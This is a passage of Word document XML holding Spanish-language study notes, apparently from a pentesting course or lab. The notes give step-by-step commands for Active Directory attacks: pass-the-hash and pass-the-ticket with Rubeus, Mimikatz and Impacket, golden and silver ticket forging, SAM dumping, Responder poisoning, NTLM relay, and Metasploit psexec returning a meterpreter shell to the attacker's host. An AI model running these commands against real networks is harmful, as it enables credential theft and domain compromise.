      <w:r w:rsidRPr="006E648D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7030A0"/>
        </w:rPr>
        <w:t>Rubeus</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3637BBD3" w14:textId="19DFCFBB" w:rsidR="006E648D" w:rsidRPr="006E648D" w:rsidRDefault="006E648D" w:rsidP="003F378E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E648D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>. \Rubeus.exe asktgt /domain:corp.local /user:administrador /rc4:(hash NTML) /ppt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C383F46" w14:textId="65A098CE" w:rsidR="00EC6A1A" w:rsidRDefault="006E648D" w:rsidP="003F378E">
      <w:r>
        <w:t xml:space="preserve">Desde linux también podemos hacerlo con </w:t>
      </w:r>
      <w:r w:rsidRPr="00A012B3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Impacket</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9E755C" w14:textId="1BA219E1" w:rsidR="006E648D" w:rsidRPr="00A012B3" w:rsidRDefault="00A012B3" w:rsidP="003F378E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A012B3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>impacket-getTGT corp.local/administrador -hashes :(hash NTML)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D0ACAD" w14:textId="26EF9CF6" w:rsidR="00A012B3" w:rsidRDefault="00A012B3" w:rsidP="003F378E">
      <w:r>
        <w:t>Guardará el ticket en un archivo .ccache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CBB6E61" w14:textId="08EC978A" w:rsidR="003F378E" w:rsidRDefault="00A012B3" w:rsidP="00843E37">
      <w:r w:rsidRPr="00A012B3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">Pass The Ticket: </w:t>
      </w:r>
      <w:r w:rsidR="007D0482">
        <w:t xml:space="preserve">Tanto el Ticket Granteed Ticket (TGT) como las claves generadas para Inicio de Sesión se encuentran almacenadas en memoria. Con </w:t>
      </w:r>
      <w:r w:rsidR="007D0482" w:rsidRPr="007D0482">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Mimikatz</w:t>
      </w:r>
      <w:r w:rsidR="007D0482">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A325C4" w14:textId="09A0C49F" w:rsidR="007D0482" w:rsidRDefault="007D0482" w:rsidP="00843E37">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D0482">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sekurlsa::tickets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="574B17BE" w14:textId="7DEE536D" w:rsidR="007D0482" w:rsidRDefault="007D0482" w:rsidP="00843E37">
      <w:r>
        <w:t>Nos vuelca el ticket y la Session Key (la clave) de todos los usuarios posibles. Podemos ahora copiar el ticket e inyectarlo en otra máquina donde no tenga privilegios. Podríamos usar una herramienta como Rubeus para usar</w:t>
      </w:r>
      <w:r w:rsidR="00877618">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C81DCB5" w14:textId="45115ABB" w:rsidR="00877618" w:rsidRDefault="00877618" w:rsidP="00843E37">
      <w:r w:rsidRPr="00877618">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.\Rubeus.exe dump</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Esto, si somos Administradores locales, vuelca un TGT+Session Key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B99B2A" w14:textId="1E81E10C" w:rsidR="00877618" w:rsidRDefault="00877618" w:rsidP="00843E37">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00877618">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>. \Rubeus.exe ptt /ticket:(ticket obtenido en Rubeus)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B152042" w14:textId="15EEA3D1" w:rsidR="00877618" w:rsidRPr="007E704C" w:rsidRDefault="007E704C" w:rsidP="00843E37">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007E704C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>ASK-TGT/TGS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="078FC174" w14:textId="25413257" w:rsidR="007E704C" w:rsidRPr="007E704C" w:rsidRDefault="007E704C" w:rsidP="00843E37">
      <w:r w:rsidRPr="007E704C">
        <w:t>Con impacket podemos suplantar también el TGT con:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79EA5040" w14:textId="62221EE2" w:rsidR="007E704C" w:rsidRDefault="007E704C" w:rsidP="00843E37">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>impacket-getTGT corp.local/administrador -hashes :(hash NTML)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB239A2" w14:textId="31560149" w:rsidR="007E704C" w:rsidRDefault="007E704C" w:rsidP="00843E37">
      <w:r>
        <w:t>Esto nos guarda automáticamente el TGT en un archivo. Lo exportamos en la variable de entorno de Kerberos con:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F64A82" w14:textId="77777777" w:rsidR="007E704C" w:rsidRPr="007E704C" w:rsidRDefault="007E704C" w:rsidP="00843E37">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007E704C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>export KRB5CCNAME=/home/kali/administrador.ccache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F620A0" w14:textId="4923E383" w:rsidR="007E704C" w:rsidRPr="008F4D0B" w:rsidRDefault="007E704C" w:rsidP="00843E37">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F4D0B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008F4D0B" w:rsidRPr="008F4D0B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">impacket-secretsdump </w:t>
      </w:r>
      <w:hyperlink r:id="rId37" w:history="1">
        <w:r w:rsidR="008F4D0B" w:rsidRPr="008F4D0B">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>corp.local/administrador@WS01.corp.local</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="008F4D0B" w:rsidRPr="008F4D0B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -k -no-pass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC85077" w14:textId="70031AD3" w:rsidR="008F4D0B" w:rsidRDefault="008F4D0B" w:rsidP="00843E37">
      <w:r>
        <w:t>No necesitamos contraseña, pues ya tenemos el TGT que nos devolverá la SAM</w:t>
      </w:r>
      <w:r w:rsidR="00D521E8">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="372D3A4D" w14:textId="77777777" w:rsidR="00D521E8" w:rsidRDefault="00D521E8" w:rsidP="00843E37">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D521E8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Golden Ticket y Silver Ticket:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D521E8">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA6713D" w14:textId="0BD7E546" w:rsidR="00D521E8" w:rsidRDefault="00D521E8" w:rsidP="00843E37">
      <w:r w:rsidRPr="00D521E8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFC000"/>
        </w:rPr>
        <w:t>Golden Ticket:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D521E8">
        <w:rPr>
          <w:color w:val="FFC000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Aunque parezca mentira, podemos simplemente crear nuestro propio TGT si tenemos acceso a la hash NTML del usuario. Necesitamos el DomainSID, que se obtiene fálcilmente con </w:t>
      </w:r>
      <w:r w:rsidRPr="00D521E8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Get-ADDomain</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36FE7BD1" w14:textId="2F0B5DF9" w:rsidR="00D521E8" w:rsidRDefault="00D521E8" w:rsidP="00843E37">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D521E8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>impacket-ticketer -nthash (hash) -domain-sid (id del dominio)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -domain corp.local (usuario)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E0B647" w14:textId="09A2FBD4" w:rsidR="00D521E8" w:rsidRDefault="00D521E8" w:rsidP="00843E37">
      <w:r>
        <w:t>Nos</w:t>
      </w:r>
      <w:r w:rsidRPr="00D521E8">
        <w:t xml:space="preserve"> lo vuelca en un archivo .ccache</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> que devemos exportar a la variable de entorno de impacket:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D78AD38" w14:textId="5097CD9C" w:rsidR="00D521E8" w:rsidRPr="00D521E8" w:rsidRDefault="00D521E8" w:rsidP="00843E37">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D521E8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>export KRB5CCNAME=/home/kali/archivo.ccache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22DEEC3D" w14:textId="35A02928" w:rsidR="00D521E8" w:rsidRPr="00D521E8" w:rsidRDefault="00D521E8" w:rsidP="00843E37">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D521E8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">impacket-psexec </w:t>
      </w:r>
      <w:hyperlink r:id="rId38" w:history="1">
        <w:r w:rsidRPr="00D521E8">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>corp.local/administrador@DC01.local</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D521E8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -k -no-pass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28F26643" w14:textId="361A96BE" w:rsidR="00D521E8" w:rsidRPr="00D521E8" w:rsidRDefault="00D521E8" w:rsidP="00843E37">
      <w:r>
        <w:t>Finalmente tendremos una shell reversa.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6630F7FE" w14:textId="684FAA8B" w:rsidR="00D521E8" w:rsidRDefault="00D521E8" w:rsidP="00843E37">
      <w:r w:rsidRPr="00D521E8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFC000"/>
        </w:rPr>
        <w:t>Silver Ticket:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D521E8">
        <w:t>Consiste en sacar el Ticket de Servicio</w:t>
      </w:r>
      <w:r w:rsidR="00B43078">
        <w:t>, se saca igual pero hay que especificar el servicio a la hora de generar el ticket</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A9004E8" w14:textId="662FBD51" w:rsidR="00D521E8" w:rsidRDefault="00D521E8" w:rsidP="00843E37">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B43078">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>impacket-ticketer -nthash (hash) -domain-sid (id del dominio) -domain corp.local</w:t>
      </w:r>
      <w:r w:rsidR="00B43078" w:rsidRPr="00B43078">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-spn cifs/DC01.corp.local (usuario)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B48541" w14:textId="11EB9BF3" w:rsidR="00B43078" w:rsidRDefault="00B43078" w:rsidP="00843E37">
      <w:r>
        <w:t>Tendríamos que exportarlo y finalmente ejecutarlo de la misma forma que el Golden Ticket.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="708CA4D5" w14:textId="2D528ABF" w:rsidR="00B43078" w:rsidRDefault="00DA44FD" w:rsidP="00843E37">
      <w:r w:rsidRPr="00206E66">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7030A0"/>
        </w:rPr>
        <w:t>NTML Roasting:</w:t>
      </w:r>
      <w:r w:rsidRPr="00206E66">
        <w:rPr>
          <w:color w:val="7030A0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>¿Qué pasa si no tenemos usuarios locales con permiso de Administración?</w:t>
      </w:r>
      <w:r w:rsidR="00206E66">
        <w:t xml:space="preserve"> Podemos, con un snnifer conseguir los dos paquetes, de entrada y salida, por ejemplo cuando un usuario se conecte a un recurso compartido. Si conseguimos ambos paquetes, es posible crear un hash y finalmente crackear la contraseña.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB358EB" w14:textId="509948D8" w:rsidR="00206E66" w:rsidRDefault="00206E66" w:rsidP="00843E37">
      <w:r w:rsidRPr="00206E66">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Envenenamiento de LLMN y NBTN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> con responder</w:t>
      </w:r>
      <w:r w:rsidRPr="00206E66">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00206E66">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Estos dos protocolos son protocolos que usan las máquinas para resolver nombres como WS01 en una IP, donde preguntan con Multicast quién es determinada IP, así que podríamos envenenar el tráfico para decirle que el recurso somos nosotros y por tanto que nos mande </w:t>
      </w:r>
      <w:r w:rsidR="009A1CA8">
        <w:t>los hashes</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D05237" w14:textId="0018AEDC" w:rsidR="00206E66" w:rsidRPr="00206E66" w:rsidRDefault="00206E66" w:rsidP="00843E37">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00206E66">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sudo responder -I eth0 -rf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E67C92F" w14:textId="4E4A950E" w:rsidR="00206E66" w:rsidRDefault="00206E66" w:rsidP="00843E37">
      <w:r>
        <w:t>Esta herramienta crea una serie de servidores  falsos para hacerse pasar por el nodo original. Solo habría que esperar que algún usuario FALLE a la hora de escribir el nombre del dominio para que la red se envenene.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E9554AD" w14:textId="06A1B999" w:rsidR="00206E66" w:rsidRDefault="00763CEC" w:rsidP="00843E37">
      <w:r w:rsidRPr="00763CEC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>NTML/SMB Relay:</w:t>
      </w:r>
      <w:r w:rsidRPr="00763CEC">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Puede ocurrir que la contraseña de los usuarios sea muy fuerte y no podamos crackearla. AL no ser el hash del usuario, no podemos hacer simplemente un Pass the Hash, ya que en ese paquete ya va la clave del Challegen incrustada. Pero podemos reenviar la petición adonde la máquina que iba a recibir originalmente al clienet; una especie de man in the middle, pero la máquina final nos mandará el challenge:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0559C6DA" w14:textId="4619DCD0" w:rsidR="00763CEC" w:rsidRPr="00763CEC" w:rsidRDefault="00763CEC" w:rsidP="00763CEC">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00763CEC">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>nt</w:t>
      </w:r>
      <w:r w:rsidRPr="00763CEC">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>es debemos saber si el firmado de Challenge NO DEBE ESTAR FIRMADO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="602E495F" w14:textId="77777777" w:rsidR="00763CEC" w:rsidRPr="00763CEC" w:rsidRDefault="00763CEC" w:rsidP="00763CEC">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00763CEC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>crackmapexec smb 192.168.0/24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC1B9D8" w14:textId="77777777" w:rsidR="00763CEC" w:rsidRPr="00763CEC" w:rsidRDefault="00763CEC" w:rsidP="00763CEC">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00763CEC">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Esto descubrirá que usuarios tienen el signing activado (Singning:True) o no (Singning:False)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C46EB46" w14:textId="0410C8FA" w:rsidR="00763CEC" w:rsidRPr="001C48F5" w:rsidRDefault="001C48F5" w:rsidP="00843E37">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C48F5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>impacket-ntlmrelayx -smb2support -tf (archivo con las ips a atacar)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="399F3F15" w14:textId="0DCC6349" w:rsidR="001C48F5" w:rsidRDefault="001C48F5" w:rsidP="00843E37">
      <w:r>
        <w:t>Antes de continuar, hay que descativar algunos servicios del responder</w:t>
      </w:r>
      <w:r w:rsidR="00F7541C">
        <w:t xml:space="preserve"> que ya activa impacket:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF41E0B" w14:textId="083585DD" w:rsidR="00F7541C" w:rsidRPr="00F7541C" w:rsidRDefault="00F7541C" w:rsidP="00843E37">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F7541C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sudo nano /etc/responder/Responder.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="792AD793" w14:textId="32DCECAD" w:rsidR="00F7541C" w:rsidRDefault="00F7541C" w:rsidP="00843E37">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Cambiar líneas: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26F1B471" w14:textId="607077BF" w:rsidR="00F7541C" w:rsidRDefault="00F7541C" w:rsidP="00843E37">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F7541C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SMB=Off</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BCEB507" w14:textId="359FEC39" w:rsidR="00F7541C" w:rsidRDefault="00F7541C" w:rsidP="00843E37">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HTTP=Off</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC56C79" w14:textId="46B7D1BA" w:rsidR="00F7541C" w:rsidRPr="00F7541C" w:rsidRDefault="00F7541C" w:rsidP="00843E37">
      <w:r w:rsidRPr="00F7541C">
        <w:lastRenderedPageBreak/>
        <w:t>A continuación ya podríamos envenenar la red con:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="300EEF88" w14:textId="1BFBB510" w:rsidR="00F7541C" w:rsidRDefault="00F7541C" w:rsidP="00843E37">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sudo responder -I (interfaz) -rf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09CAA9AC" w14:textId="06E6A194" w:rsidR="00F7541C" w:rsidRDefault="00650822" w:rsidP="00843E37">
      <w:r w:rsidRPr="00650822">
        <w:t>Esto automáticamente volcará la SAM, pero puedes hacer mucho más, como ejecutar un comando o redirigir a un proxy para volcar absolutamente TODO el dominio. Incluso podríamos mandar una shell reversa</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75D3C2C4" w14:textId="3B927107" w:rsidR="00650822" w:rsidRDefault="006A0583" w:rsidP="00843E37">
      <w:r w:rsidRPr="006A0583">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Tokem Impersonation con Metasploit:</w:t>
      </w:r>
      <w:r w:rsidRPr="006A0583">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Si tenemos un Administrador local podemos robar el token de acceso de algún usuario que esté conectado en nuestro sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6197568A" w14:textId="1EC35BA6" w:rsidR="006A0583" w:rsidRPr="006A0583" w:rsidRDefault="006A0583" w:rsidP="00843E37">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A0583">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51DB8856" w14:textId="4FB96152" w:rsidR="006A0583" w:rsidRPr="006A0583" w:rsidRDefault="006A0583" w:rsidP="00843E37">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A0583">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>use exploit/windows/smb/psexec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0657677D" w14:textId="273F6C05" w:rsidR="006A0583" w:rsidRPr="006A0583" w:rsidRDefault="006A0583" w:rsidP="00843E37">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A0583">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>set RHOST (ip de la máquina)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2920F90D" w14:textId="52507363" w:rsidR="006A0583" w:rsidRPr="006A0583" w:rsidRDefault="006A0583" w:rsidP="00843E37">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A0583">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>set smbdomain CORP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66CF05C5" w14:textId="74DBAB6C" w:rsidR="006A0583" w:rsidRPr="006A0583" w:rsidRDefault="006A0583" w:rsidP="00843E37">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A0583">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>set smbpass Passw0rd1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD756F4" w14:textId="55D80102" w:rsidR="006A0583" w:rsidRPr="006A0583" w:rsidRDefault="006A0583" w:rsidP="00843E37">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A0583">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>set smbuser empleado1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="028110BB" w14:textId="2F6121DA" w:rsidR="006A0583" w:rsidRPr="006A0583" w:rsidRDefault="006A0583" w:rsidP="00843E37">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A0583">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>set lhost (nuestra IP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40EA67FD" w14:textId="7A5AB83D" w:rsidR="006A0583" w:rsidRPr="006A0583" w:rsidRDefault="006A0583" w:rsidP="00843E37">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A0583">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E14B305" w14:textId="3FDAD275" w:rsidR="006A0583" w:rsidRDefault="006A0583" w:rsidP="00843E37">
      <w:r>
        <w:t>Y nos devolverá un meterpreter:</w:t>
      </w:r>
    </w:p>
